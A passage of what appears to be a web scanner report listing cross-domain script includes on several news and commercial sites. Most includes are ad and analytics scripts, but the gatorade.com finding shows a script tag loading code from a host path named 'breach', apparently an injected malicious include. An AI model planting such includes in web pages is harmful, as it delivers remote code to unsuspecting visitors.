Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 30 Jan 2011 17:10:30 GMT
Date: Sun, 30 Jan 2011 17:10:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296407429?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296407429?" type="text/javascript">
</script>
...[SNIP]...

23.453. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 29 Jan 2011 23:53:34 GMT
Date: Sat, 29 Jan 2011 23:53:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296344904?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296344904?" type="text/javascript">
</script>
...[SNIP]...

23.454. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 30 Jan 2011 17:10:29 GMT
Date: Sun, 30 Jan 2011 17:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" type="text/javascript">
</script>
...[SNIP]...

23.455. http://www.gatorade.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gatorade.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx HTTP/1.1
Host: www.gatorade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:22:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bcqqnluqy4sgfbug42ap0b55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Gatorad
...[SNIP]...
<meta name="google-site-verification" content="urVYKRjWIeor2vJRZ8fvAklweDgUIM76CTiQ-jlkHiE" />

<script type="text/javascript" src="http://321cba.com/breach/18.js"></script>
...[SNIP]...

23.456. https://www.google.com/adsense/support/bin/request.py

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /adsense/support/bin/request.py

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adsense/support/bin/request.py HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D303678ee3ceffa89%26v%3D2%26c%3De08e7d44%26s%3D4d44bd51%26t%3DR%3A0%3A%26sessref%3D; Expires=Sun, 30-Jan-2011 01:52:25 GMT; Path=/adsense/support; Secure; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Sun, 30 Jan 2011 01:22:25 GMT
Expires: Sun, 30 Jan 2011 01:22:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//ssl.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

23.457. http://www.hobbyspace.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hobbyspace.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.hobbyspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:06:12 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 59667

<html><!-- #BeginTemplate "/Templates/HomePage.dwt" -->
<head>
<!-- #BeginEditable "doctitle" -->
<title>HobbySpace - Home</title>


<!-- #EndEditable -->
<meta http-equiv="Content-Type" content="text
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.assoc-amazon.com/s/ads.js"></script>
...[SNIP]...
<!-- #BeginLibraryItem "/Library/amazonScript.lbi" --><script type="text/javascript" src="http://www.assoc-amazon.com/s/link-enhancer?tag=hobbyspace">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
    src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.458. http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoovers.com
Path:   /business-information/--pageid__13823--/global-mktg-index.xhtml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business-information/--pageid__13823--/global-mktg-index.xhtml HTTP/1.1
Host: www.hoovers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:36 GMT
Server: Apache
Cache-Control: max-age=3600
Expires: Sun, 30 Jan 2011 02:53:36 GMT
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Set-Cookie: HID=173.193.214.243.1296352416131983; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: HID=10.1.1.227.283831296352416137; path=/; expires=Fri, 29-Jan-16 01:53:36 GMT; domain=.hoovers.com
Set-Cookie: BIGipServerholpriv-colo1=1140916490.20480.0000; path=/
P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
Connection: close
Set-Cookie: BIGipServerwww-1=1341968906.20480.0000; path=/
Content-Length: 18009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Take Th
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.bizographics.com/convert_data.js?partner_id=169"></script>
...[SNIP]...

23.459. http://www.interactivedata-rts.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interactivedata-rts.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.interactivedata-rts.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kdk23kds=m0cul2o9mqitm9hr94f71kgc03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script><script language="javascript1.1" src="http://www.interactivedata.com/js/hbx.js"></script>
...[SNIP]...

23.460. http://www.kanoodle.com/search_spy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kanoodle.com
Path:   /search_spy.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search_spy.html HTTP/1.1
Host: www.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.kanoodle.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:31 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 14397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999<
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.pulse360.com/yui/build/yahoo/yahoo-min.js"></script>
<script type="text/javascript" src="http://static.pulse360.com/yui/build/yuiloader/yuiloader-beta-min.js" ></script>
<!-- Source File -->
<script type="text/javascript" src="http://static.pulse360.com/yui/build/cookie/cookie-beta-min.js"></script>
...[SNIP]...

23.461. http://www.livescience.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livescience.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.livescience.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 68905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>LiveS
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</div><script type='text/javascript' id='popup_tag_script' src='http://api.toptenreviews.com/r/c/request.php?path=tmn/ls&sub_id=testsubid'></script>
...[SNIP]...

23.462. http://www.merchantcircle.com/corporate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merchantcircle.com
Path:   /corporate/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/ HTTP/1.1
Host: www.merchantcircle.com
Proxy-Connection: keep-alive
Referer: http://www.bloglines.com/contact/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 17:26:34 GMT
Cache-Control: max-age=300
Content-Type: text/html
Content-Length: 17617
Date: Sun, 30 Jan 2011 17:21:34 GMT
Server: lighttpd/1.4.11

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MerchantCircle.com |
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
<div style="float:left;clear:left;width:100px;height:60px;margin-left:30px;">
   <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.merchantcircle.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" ></script>
...[SNIP]...

23.463. http://www.merchantcircle.com/corporate/503.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merchantcircle.com
Path:   /corporate/503.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /corporate/503.html HTTP/1.1
Host: www.merchantcircle.com
Proxy-Connection: keep-alive
Referer: http://www.merchantcircle.com/corporate/
X-Requested-With: XMLHttpRequest
Accept: application/json
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=36432316.1296408105.1.1.utmcsr=bloglines.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact/; __utma=36432316.11964383.1296408105.1296408105.1296408105.1; __utmc=36432316; __utmb=36432316.1.10.1296408105

Response

HTTP/1.1 200 OK
Expires: Sun, 30 Jan 2011 18:21:49 GMT
Cache-Control: max-age=3600
Content-Type: text/html
Content-Length: 12113
Date: Sun, 30 Jan 2011 17:21:49 GMT
Server: lighttpd/1.4.11

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>MerchantCircle.com |
...[SNIP]...
</script>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

23.464. http://www.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; stvx=gendermodule:forher
Host: www.redacted

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:26:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA39
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; domain=www.redacted; expires=Tue, 01-Feb-2011 23:26:28 GMT; path=/
Set-Cookie: expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; domain=redacted; expires=Sat, 12-Feb-2011 23:26:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
ntCoent-Length: 86107
Content-Length: 86107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

23.465. http://www.redacted/defaultwpe7.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /defaultwpe7.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /defaultwpe7.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA22
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 14366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
</div><script type="text/javascript" src="http://tk2.stj.s-msn.com/br/hp/11/en-us/js/404_1.js"></script>
...[SNIP]...

23.466. http://www.redacted/sck.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /sck.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sck.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA24
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 2568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/1c/4a0253de6eac448d8f2c39c53f8926.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...

23.467. http://www.redacted/worldwide.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redacted
Path:   /worldwide.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /worldwide.aspx HTTP/1.1
Host: www.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; CULTURE=EN-US; CC=US; MUID=AD04D6F8B2FF44629973BD0674351135; Sample=63; mh=MSFT; expac=813II6a37_1229:C~41II4a36_0830:WP10_4~271II8B37_0107:C|; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; stvx=gendermodule:forher; MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:53:38 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><m
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...

23.468. http://www.msnbc.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
RTSS: 1
Expires: Sat, 29 Jan 2011 23:53:39 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 23:53:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.redacted
Set-Cookie: SSID=AwDszSkAAAAAg6hETc0GBAmDqERNAQAAAAAAAAAAAAAAAACDqERNAAAAAAAAAAAAAAA; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: SSSC=108.G5567760320082216653.1.0.0; path=/; domain=.redacted
Set-Cookie: SSRT=g6hETQE; path=/; domain=.redacted; expires=Sun, 29-Jan-2012 23:53:39 GMT
Set-Cookie: MC1=GUID=a90948ea4b8d4829b2d58fc150cbb23e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Content-Length: 208222

<html><head>
<!-- // --><script language='javascript' type='text/javascript'>
<!--
   req_108_1296345219=new Image();
req_108_1296345219.src='/__ssobj/ard.png?5567760320082216653_1_0-108-'+(11527*112461
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
<!-- gss styles -->
<script src="http://ajax.microsoft.com/ajax/jquery.cycle/2.88/jquery.cycle.all.min.js" type="text/javascript"></script>
...[SNIP]...
</h6><script src="http://content.pulse360.com/91263EC8-A727-11DF-BD32-51423FF5047F" type="text/javascript"></script>
...[SNIP]...

23.469. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/24780215/ns/technology_and_science-games

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/24780215/ns/technology_and_science-games HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Cnection: close
Expires: Sun, 30 Jan 2011 03:09:37 GMT
Date: Sun, 30 Jan 2011 03:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 150460

<html><head><title>CITIZEN GAMER- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="stylesheet" type="text/css" href="/default.ashx/id/21589549" /><link rel="
...[SNIP]...
</script><script type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery"></script>
...[SNIP]...
<div> <script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&amp;db=context&amp;query=*general_network:premium&amp;cgroup=d_technologygames&amp;format=standard&amp;numresults=5&amp;linkcolor=339933&amp;titlecolor=339933&amp;fontsize=11&amp;textcolor=666666"></script>
...[SNIP]...

23.470. http://www.msnbc.redacted/id/26315908/vp=41321791&

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msnbc.redacted
Path:   /id/26315908/vp=41321791&

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /id/26315908/vp=41321791& HTTP/1.1
